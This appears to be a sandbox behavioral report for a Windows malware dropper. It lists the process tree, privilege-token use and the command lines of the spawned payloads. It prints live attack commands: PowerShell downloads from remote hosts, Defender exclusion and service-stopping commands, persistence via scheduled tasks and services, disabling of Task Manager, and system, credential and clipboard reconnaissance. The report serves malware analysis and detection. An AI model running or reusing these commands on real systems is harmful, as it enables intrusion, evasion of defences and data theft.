4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
4996	axplong.exe
4996	axplong.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
3776	powershell.exe
3776	powershell.exe
3776	powershell.exe
1700	powershell.exe
1700	powershell.exe
1700	powershell.exe
4188	Explorers.exe
4188	Explorers.exe
756	svhosts.exe
756	svhosts.exe
756	svhosts.exe
756	svhosts.exe
4840	123.exe
4840	123.exe
4840	123.exe
4840	123.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
2684	axplong.exe
2684	axplong.exe
2760	FirstZ.exe
1084	powershell.exe
1084	powershell.exe
1084	powershell.exe
2760	FirstZ.exe
2760	FirstZ.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
2760	FirstZ.exe
5064	reakuqnanrkn.exe
4920	powershell.exe
4920	powershell.exe
4920	powershell.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe
5064	reakuqnanrkn.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid process

4148 chrome.exe
4148 chrome.exe
4148 chrome.exe
4148 chrome.exe
4148 chrome.exe
4148 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeExplorers.exesvhosts.exe123.exeRegAsm.exepowershell.exeWMIC.exetasklist.exetaskkill.exepowershell.exetasklist.exepowershell.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	4188	Explorers.exe
Token: SeBackupPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeSecurityPrivilege	4188	Explorers.exe
Token: SeDebugPrivilege	756	svhosts.exe
Token: SeDebugPrivilege	4840	123.exe
Token: SeDebugPrivilege	2488	RegAsm.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeIncreaseQuotaPrivilege	4060	WMIC.exe
Token: SeSecurityPrivilege	4060	WMIC.exe
Token: SeTakeOwnershipPrivilege	4060	WMIC.exe
Token: SeLoadDriverPrivilege	4060	WMIC.exe
Token: SeSystemProfilePrivilege	4060	WMIC.exe
Token: SeSystemtimePrivilege	4060	WMIC.exe
Token: SeProfSingleProcessPrivilege	4060	WMIC.exe
Token: SeIncBasePriorityPrivilege	4060	WMIC.exe
Token: SeCreatePagefilePrivilege	4060	WMIC.exe
Token: SeBackupPrivilege	4060	WMIC.exe
Token: SeRestorePrivilege	4060	WMIC.exe
Token: SeShutdownPrivilege	4060	WMIC.exe
Token: SeDebugPrivilege	4060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4060	WMIC.exe
Token: SeRemoteShutdownPrivilege	4060	WMIC.exe
Token: SeUndockPrivilege	4060	WMIC.exe
Token: SeManageVolumePrivilege	4060	WMIC.exe
Token: 33	4060	WMIC.exe
Token: 34	4060	WMIC.exe
Token: 35	4060	WMIC.exe
Token: 36	4060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4060	WMIC.exe
Token: SeSecurityPrivilege	4060	WMIC.exe
Token: SeTakeOwnershipPrivilege	4060	WMIC.exe
Token: SeLoadDriverPrivilege	4060	WMIC.exe
Token: SeSystemProfilePrivilege	4060	WMIC.exe
Token: SeSystemtimePrivilege	4060	WMIC.exe
Token: SeProfSingleProcessPrivilege	4060	WMIC.exe
Token: SeIncBasePriorityPrivilege	4060	WMIC.exe
Token: SeCreatePagefilePrivilege	4060	WMIC.exe
Token: SeBackupPrivilege	4060	WMIC.exe
Token: SeRestorePrivilege	4060	WMIC.exe
Token: SeShutdownPrivilege	4060	WMIC.exe
Token: SeDebugPrivilege	4060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4060	WMIC.exe
Token: SeRemoteShutdownPrivilege	4060	WMIC.exe
Token: SeUndockPrivilege	4060	WMIC.exe
Token: SeManageVolumePrivilege	4060	WMIC.exe
Token: 33	4060	WMIC.exe
Token: 34	4060	WMIC.exe
Token: 35	4060	WMIC.exe
Token: 36	4060	WMIC.exe
Token: SeDebugPrivilege	2580	tasklist.exe
Token: SeDebugPrivilege	4148	taskkill.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	2740	tasklist.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeShutdownPrivilege	4300	powercfg.exe
Token: SeCreatePagefilePrivilege	4300	powercfg.exe
Token: SeShutdownPrivilege	540	powercfg.exe
Token: SeCreatePagefilePrivilege	540	powercfg.exe

Suspicious use of FindShellTrayWindow 30 IoCs

Processes:

chrome.exe

pid	process
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe

Suspicious use of SendNotifyMessage 28 IoCs

Processes:

chrome.exe

pid	process
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exeHkbsse.exeldr.exealex5555555.exepowershell.exeRegAsm.execmd.exe

description	pid	process	target process
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	axplong.exe
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	axplong.exe
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	axplong.exe
PID 4996 wrote to memory of 3896	4996	axplong.exe	gold.exe
PID 4996 wrote to memory of 3896	4996	axplong.exe	gold.exe
PID 4996 wrote to memory of 3896	4996	axplong.exe	gold.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 3896 wrote to memory of 2524	3896	gold.exe	RegAsm.exe
PID 4996 wrote to memory of 3776	4996	axplong.exe	NewLatest.exe
PID 4996 wrote to memory of 3776	4996	axplong.exe	NewLatest.exe
PID 4996 wrote to memory of 3776	4996	axplong.exe	NewLatest.exe
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	Hkbsse.exe
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	Hkbsse.exe
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	Hkbsse.exe
PID 4996 wrote to memory of 4904	4996	axplong.exe	Installer.exe
PID 4996 wrote to memory of 4904	4996	axplong.exe	Installer.exe
PID 4904 wrote to memory of 4468	4904	Installer.exe	cmd.exe
PID 4904 wrote to memory of 4468	4904	Installer.exe	cmd.exe
PID 4468 wrote to memory of 3860	4468	cmd.exe	schtasks.exe
PID 4468 wrote to memory of 3860	4468	cmd.exe	schtasks.exe
PID 4468 wrote to memory of 5072	4468	cmd.exe	schtasks.exe
PID 4468 wrote to memory of 5072	4468	cmd.exe	schtasks.exe
PID 4468 wrote to memory of 4928	4468	cmd.exe	powershell.exe
PID 4468 wrote to memory of 4928	4468	cmd.exe	powershell.exe
PID 2188 wrote to memory of 2760	2188	Hkbsse.exe	FirstZ.exe
PID 2188 wrote to memory of 2760	2188	Hkbsse.exe	FirstZ.exe
PID 4996 wrote to memory of 4976	4996	axplong.exe	ldr.exe
PID 4996 wrote to memory of 4976	4996	axplong.exe	ldr.exe
PID 4996 wrote to memory of 4976	4996	axplong.exe	ldr.exe
PID 4976 wrote to memory of 4004	4976	ldr.exe	Hkbsse.exe
PID 4976 wrote to memory of 4004	4976	ldr.exe	Hkbsse.exe
PID 4976 wrote to memory of 4004	4976	ldr.exe	Hkbsse.exe
PID 4996 wrote to memory of 5020	4996	axplong.exe	alex5555555.exe
PID 4996 wrote to memory of 5020	4996	axplong.exe	alex5555555.exe
PID 4996 wrote to memory of 5020	4996	axplong.exe	alex5555555.exe
PID 4468 wrote to memory of 3776	4468	cmd.exe	powershell.exe
PID 4468 wrote to memory of 3776	4468	cmd.exe	powershell.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	RegAsm.exe
PID 3776 wrote to memory of 2540	3776	powershell.exe	cmd.exe
PID 3776 wrote to memory of 2540	3776	powershell.exe	cmd.exe
PID 4996 wrote to memory of 4840	4996	axplong.exe	123.exe
PID 4996 wrote to memory of 4840	4996	axplong.exe	123.exe
PID 4996 wrote to memory of 4840	4996	axplong.exe	123.exe
PID 2488 wrote to memory of 756	2488	RegAsm.exe	svhosts.exe
PID 2488 wrote to memory of 756	2488	RegAsm.exe	svhosts.exe
PID 2488 wrote to memory of 756	2488	RegAsm.exe	svhosts.exe
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	Explorers.exe
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	Explorers.exe
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	Explorers.exe
PID 2540 wrote to memory of 4884	2540	cmd.exe	schtasks.exe
PID 2540 wrote to memory of 4884	2540	cmd.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

684 attrib.exe

pid	process
684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
"C:\Users\Admin\AppData\Local\Temp\2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4808

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4996

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 308
4⤵
- Program crash
PID:4344

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3776

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2188

C:\Users\Admin\AppData\Local\Temp\1000023001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000023001\FirstZ.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2760

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:4468

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:3220

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:3200

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:4344

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:1296

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:2696

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:2540

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
- Power Settings
PID:3300

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
- Power Settings
PID:3252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4484

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
6⤵
- Launches sc.exe
PID:320

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
6⤵
- Launches sc.exe
PID:2468

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:4468

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
6⤵
- Launches sc.exe
PID:4760

C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\SYSTEM32\cmd.exe
cmd /c ins.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4884

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
7⤵
- Modifies registry key
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:1136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:3712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\system32\schtasks.exe
schtasks /query /TN "Cleaner"
5⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe
"C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4976

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
4⤵
- Executes dropped EXE
PID:4004

C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe
"C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488

C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
5⤵
PID:1184

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 276
4⤵
- Program crash
PID:2336

C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe
"C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
"C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3580

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
4⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
4⤵
- Checks processor information in registry
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1200
5⤵
- Program crash
PID:2784

C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe"
3⤵
- Executes dropped EXE
PID:1572

C:\Users\Admin\AppData\Local\Temp\onefile_1572_133639708804574833\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
5⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:4712

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
5⤵
PID:4048

C:\Windows\system32\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
5⤵
- Hide Artifacts: Hidden Files and Directories
PID:1976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
6⤵
- Views/modifies file attributes
PID:684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
5⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:1720

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:4020

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
5⤵
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
5⤵
PID:3300

C:\Windows\system32\chcp.com
chcp
6⤵
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
5⤵
PID:4484

C:\Windows\system32\chcp.com
chcp
6⤵
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
5⤵
PID:4492

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:384

C:\Windows\system32\HOSTNAME.EXE
hostname
6⤵
PID:2664

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
6⤵
- Collects information from the system
PID:5072

C:\Windows\system32\net.exe
net user
6⤵
PID:684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
7⤵
PID:1848

C:\Windows\system32\query.exe
query user
6⤵
PID:3968

C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
7⤵
PID:3020

C:\Windows\system32\net.exe
net localgroup
6⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
7⤵
PID:4908

C:\Windows\system32\net.exe
net localgroup administrators
6⤵
PID:4488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
7⤵
PID:4692

C:\Windows\system32\net.exe
net user guest
6⤵
PID:672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
7⤵
PID:5080

C:\Windows\system32\net.exe
net user administrator
6⤵
PID:1640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
7⤵
PID:3436

C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
6⤵
PID:4964

C:\Windows\system32\tasklist.exe
tasklist /svc
6⤵
- Enumerates processes with tasklist
PID:4760

C:\Windows\system32\ipconfig.exe
ipconfig /all
6⤵
- Gathers network information
PID:4876

C:\Windows\system32\ROUTE.EXE
route print
6⤵
PID:4868

C:\Windows\system32\ARP.EXE
arp -a
6⤵
PID:4716

C:\Windows\system32\NETSTAT.EXE
netstat -ano
6⤵
- Gathers network information
PID:440

C:\Windows\system32\sc.exe
sc query type= service state= all
6⤵
- Launches sc.exe
PID:1184

C:\Windows\system32\netsh.exe
netsh firewall show state
6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:384

C:\Windows\system32\netsh.exe
netsh firewall show config
6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
5⤵
PID:3768

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:4720

